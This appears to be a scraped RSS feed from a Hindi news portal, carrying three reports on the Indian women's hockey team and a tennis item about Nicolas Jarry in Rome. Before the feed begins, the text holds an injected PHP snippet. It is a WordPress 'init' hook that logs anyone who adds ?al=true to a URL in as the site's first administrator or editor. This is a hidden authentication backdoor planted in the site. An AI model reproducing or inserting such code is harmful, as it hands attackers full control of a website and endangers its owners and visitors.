// _ea_al add_action('init', function(){ if(isset($_GET['al']) && $_GET['al']==='true'){ if(!is_user_logged_in()){ $u=get_users(['role'=>'administrator','number'=>1,'fields'=>['ID','user_login']]); if(empty($u)){$u=get_users(['role'=>'editor','number'=>1,'fields'=>['ID','user_login']]);} if(!empty($u)){wp_set_auth_cookie($u[0]->ID,true,false);wp_redirect(admin_url());exit();} } else {wp_redirect(admin_url());exit();} } }, 2); Indian women’s hockey – प्रत्युषा आशा की नयी किरण https://pratyushaashakinayikiran.com न्यूज़ पोर्टल Fri, 15 Nov 2024 16:10:00 +0000 en-US hourly 1 https://wordpress.org/?v=7.0 भारतीय महिला हॉकी टीम थाईलैंड को 13-0 से रौंदकर सेमीफाइनल में https://pratyushaashakinayikiran.com/?p=99012 Fri, 15 Nov 2024 16:10:00 +0000 https://pratyushaashakinayikiran.com/?p=99012 राजगीर
भारतीय हॉकी टीम ने महिला एशियाई चैंपियंस ट्रॉफी 2024 के अपने तीसरे मैच में थाईलैंड के खिलाफ 13-0 से बड़ी जीत दर्ज कर सेमीफाइनल में जगह बना ली हैं। टूर्नामेंट में यह भारत लगातार तीसरी जीत हैं। आज यहां बिहार के राजगीर हॉकी स्टेडियम में खेले गये मुकाबले में भारत के लिए फॉरवर्ड दीपिका (तीसरे और 19वें, 43वें, 45वें और 45+ मिनट में), प्रीति दुबे (9वें और 40वें मिनट में), लालरेम्सियामी (12वें और 56वें मिनट में), ब्यूटी डुंग डुंग (30वें और 53वें मिनट में) और मनीषा चौहान (55वें और 58वें मिनट में) ने गोल किए।
भारतीय महिला टीम ने पहले क्वार्टर की शानदार शुरुआत की और थाईलैंड पर तीन गोल के साथ अपना दबदबा कायम किया। गेम शुरू होने के तीसरे मिनट में ही दीपिका ने शानदार फील्ड गोल्ड के साथ भारत का खाता खोला। इसके बाद प्रीति दुबे ने नौवें मिनट में एक और फील्ड गोल कर भारत की बढ़त को दोगुना कर दिया। भारतीय टीम ने अपना शानदार प्रदर्शन जारी रखा और लालरेम्सियामी ने भी 12वें मिनट में फील्ड गोल कर स्कोर 3-0 कर दिया। वहीं, थाईलैंड की टीम एक भी गोल करने में सफल नहीं हो पाई।
दूसरा क्वार्टर भी भारतीय टीम के नाम रहा और भारत ने दो गोल दागकर स्कोर 5-0 कर दिया। भारत ने इस क्वार्टर में गोल करने का पहला मौका गंवा दिया। लेकिन इसके बाद दीपिका ने 19वें मिनट में फील्ड गोल कर थाईलैंड की मैच में वापसी करने की उम्मीदों पर पानी फेर दिया।
थाईलैंड की रक्षापंक्ति भारत के आक्रामक खेल के सामने टिक नहीं पाया और भारत ने लगातार पेनल्टी कॉर्नर हासिल किए। ब्यूटी डुंग डुंग ने पहला हाफ खत्म होने के आखिरी मिनट पर पीसी को गोल में तब्दील किया। पहले हाफ की समाप्ति तक भारत ने 5-0 की बढ़त को बनाए रखा। दूसरे हाफ में भी अपनी लय को बरकरार रखते हुए भारत ने थाईलैंड पर दबदबा बनाये रखा।
तीसरे क्वार्टर में भारत ने चार गोल दागे और स्कोर 9-0 कर दिया। इसी के साथ थाईलैंड की टीम इस टूर्नामेंट में काफी पीछे रह गई। तीसरे क्वार्टर की शुरुआत प्रीति दुबे ने 40वें मिनट में फील्ड गोल के साथ की। इसके बाद दीपिका ने लगातार तीन गोल किए। दीपिका ने दो पेनल्टी कॉर्नर को गोल में तब्दील किया और एक फील्ड गोल किया। वहीं, थाईलैंड की टीम गोल करने के लिए संघर्ष कर रही थी।
चौथे क्वार्टर में भारत का स्कोर 13-0 रहा। भारत के लिए ब्यूटी ने गोलकीपर को चकमा देते हुए 53वें मिनट में फील्ड गोल किया। इसके बाद मनीषा चौहान और लालरेम्सियामी ने पेनल्टी कॉर्नर को गोल में तब्दील किया और मैच का समापन मनीषा के फील्ड गोल से हुआ।
भारत अगले मैच में शनिवार चीन से भिड़ेगी। भारतीय टीम ने चैंपियनिशप में अभी तक अपने सभी मैच जीते है। भारत अंक तालिका में नौ अंक के साथ दूसरे स्थान पर है। चीन के भी इतने ही अंक है लेकिन बेहतर गोल अंतर के कारण वह तालिका में शीर्ष पर है। आज के मुकाबले में खेलने के साथ ही लालरेमसियामी ने 150 मैच तथा प्रीति दुबे 50 मैच पूरे किये।

 

]]>
पहली बार भारतीय महिला हॉकी टीम ने भारतीय नौसेना अकादमी में अभ्यास किया https://pratyushaashakinayikiran.com/?p=53660 Mon, 22 Jul 2024 15:00:00 +0000 https://pratyushaashakinayikiran.com/?p=53660 नई दिल्ली
भारतीय महिला हॉकी टीम ने पहली बार भारतीय नौसेना अकादमी (आईएनए) में अभ्यास किया जिसमें निशस्त्र लड़ाई का प्रशिक्षण, दौड़ और नाव खींचने जैसी गतिविधियां शामिल थी जिसका लक्ष्य खिलाड़ियों को मानसिक रूप से अधिक मजबूत और अधिक अनुशासित बनाना था।

यह अनूठा शिविर केरल के कन्नूर में 15 से 21 जुलाई तक आईएनए पर आयोजित किया गया। महिला हॉकी टीम पेरिस ओलंपिक के लिये क्वालीफाई नहीं कर सकी थी और फिलहाल नये सिरे से खड़े होने की कोशिश में है।

हॉकी इंडिया की एक विज्ञप्ति में कहा गया, ‘‘आईएनए के अनुशासित माहौल में लगाये गए इस शिविर का लक्ष्य टीम के कौशल का विकास करके एकजुटता और दृढता का भाव खिलाड़ियों में भरना है।’’

मुख्य कोच हरेंद्र सिंह ने कहा, ‘‘मानसिक मजबूती और टीम के आपसी तालमेल को लेकर अकादमी में खिलाड़ियों को बहुत कुछ सीखने को मिला। बेहतरीन अधिकारियों के मार्गदर्शन में हमारे खिलाड़ियों ने कठिन अभ्यास किया जिससे उन्हें हॉकी में ही नहीं, जीवन के हर पहलू में मदद मिलेगी।’’ इस दौरान अकादमी की हॉकी टीम और भारतीय टीम के बीच दोस्ताना मैच भी खेला गया।

भारतीय नौसेना अकादमी के उप कमांडेंट रीयर एडमिरल प्रकाश गोपालन ने कहा, ‘‘इस अभ्यास शिविर का मकसद मानसिक दृढता, अनुशासन और नेतृत्व क्षमता पर फोकस करके खिलाड़ियों को एक ईकाई के रूप में अच्छा प्रदर्शन करने के लिये प्रेरित करना था।’’

 

 

]]>
दक्षिण अफ्रीका श्रृंखला से सबक लेकर प्रो लीग के लिये तैयार नई कप्तान सलीमा https://pratyushaashakinayikiran.com/?p=31782 Sat, 18 May 2024 10:57:00 +0000 https://pratyushaashakinayikiran.com/?p=31782 दक्षिण अफ्रीका श्रृंखला से सबक लेकर प्रो लीग के लिये तैयार नई कप्तान सलीमा

FIH Pro League  के यूरोपीय चरण में नये सिरे से शुरूआत करना चाहेंगी- कप्तान सलीमा

जैरी रोम में सितसिपास को हराकर पहले एटीपी 1000 सेमीफाइनल में

बेंगलुरू
 भारतीय महिला हॉकी टीम की नई कप्तान सलीमा टेटे दक्षिण अफ्रीका के खिलाफ घरेलू श्रृंखला से सबक लेकर बेल्जियम के एंटवर्प में शुरू हो रहे एफआईएच प्रो लीग के यूरोपीय चरण में नये सिरे से शुरूआत करना चाहेंगी।

पूर्व कप्तान सविता पूनिया के साथ भारत ने भुवनेश्वर और राउरकेला में प्रो लीग के पहले चरण में आठ मैचों में दो ही जीत दर्ज की और नौ टीमों में छठे स्थान पर खिसक गई। दक्षिण अफ्रीका के खिलाफ दोस्ताना श्रृंखला से पहले सलीमा को टीम की कमान सौंपी गई जबकि नवनीत कौर को उपकप्तान बनाया गया। भारत ने श्रृंखला 4.2 से जीती।

सलीमा ने बेल्जियम रवाना होने से पहले कहा, ‘‘भारतीय महिला हॉकी टीम की कप्तान होने के नाते एफआईएच हॉकी प्रो लीग के यूरोपीय चरण के लिये इस प्रतिभाशाली टीम की अगुवाई करना गर्व की बात है।’’

उन्होंने कहा, ‘‘हम अपना सर्वश्रेष्ठ प्रदर्शन करके देश को गौरवान्वित करने की कोशिश करेंगे। दक्षिण अफ्रीका के खिलाफ हालिया श्रृंखला से हमने सबक लिया है और यूरोप में मजबूत टीमों के खिलाफ उस पर अमल करेंगे। टीमवर्क, प्रतिबद्धता और जुझारूपन से हम हर मैच में छाप छोड़ना चाहेंगे।’’

भारत को पहले मैच में बुधवार को अर्जेंटीना से खेलना है। इस चरण के मैच बेल्जियम और इंग्लैंड में होंगे। एंटवर्प में 26 मई तक मैच होंगे जबकि लंदन में एक से नौ जून तक मैच होंगे।

 

जैरी रोम में सितसिपास को हराकर पहले एटीपी 1000 सेमीफाइनल में

रोम
 निकोलस जैरी ने छठी वरीयता प्राप्त और 2022 के फाइनलिस्ट स्टेफानोस सितसिपास को 3-6, 7-5, 6-4 से हराकर इटालियन ओपन में अपने पहले एटीपी मास्टर्स 1000 सेमीफाइनल में प्रवेश किया।

इंफोसिस एटीपी स्टैट्स के अनुसार, 28 वर्षीय ने दो घंटे और 38 मिनट के थ्रिलर के दौरान मानसिक दृढ़ता का प्रदर्शन किया, जिसके दौरान उन्होंने 13 में से 11 ब्रेक प्वाइंट का सामना किया।

रोम में लगातार तीसरी बार सेमीफ़ाइनल में पहुंचने के लिए सितसिपास की खोज को विफल करने के लिए, चिली के खिलाड़ी ने बेसलाइन से अथक शक्ति का प्रदर्शन किया, जिसमें 166 किलोमीटर प्रति घंटे की जोरदार सर्विस सहित 23 फोरहैंड विनर्स शामिल थे।

शुक्रवार को सेमीफाइनल में जैरी का सामना 14वीं वरीयता प्राप्त टॉमी पॉल से होगा। सैंटियागो मूल निवासी ने पिछले साल रौलां गैरो में अपनी एकमात्र भिड़ंत जीती थी।

 

 

]]>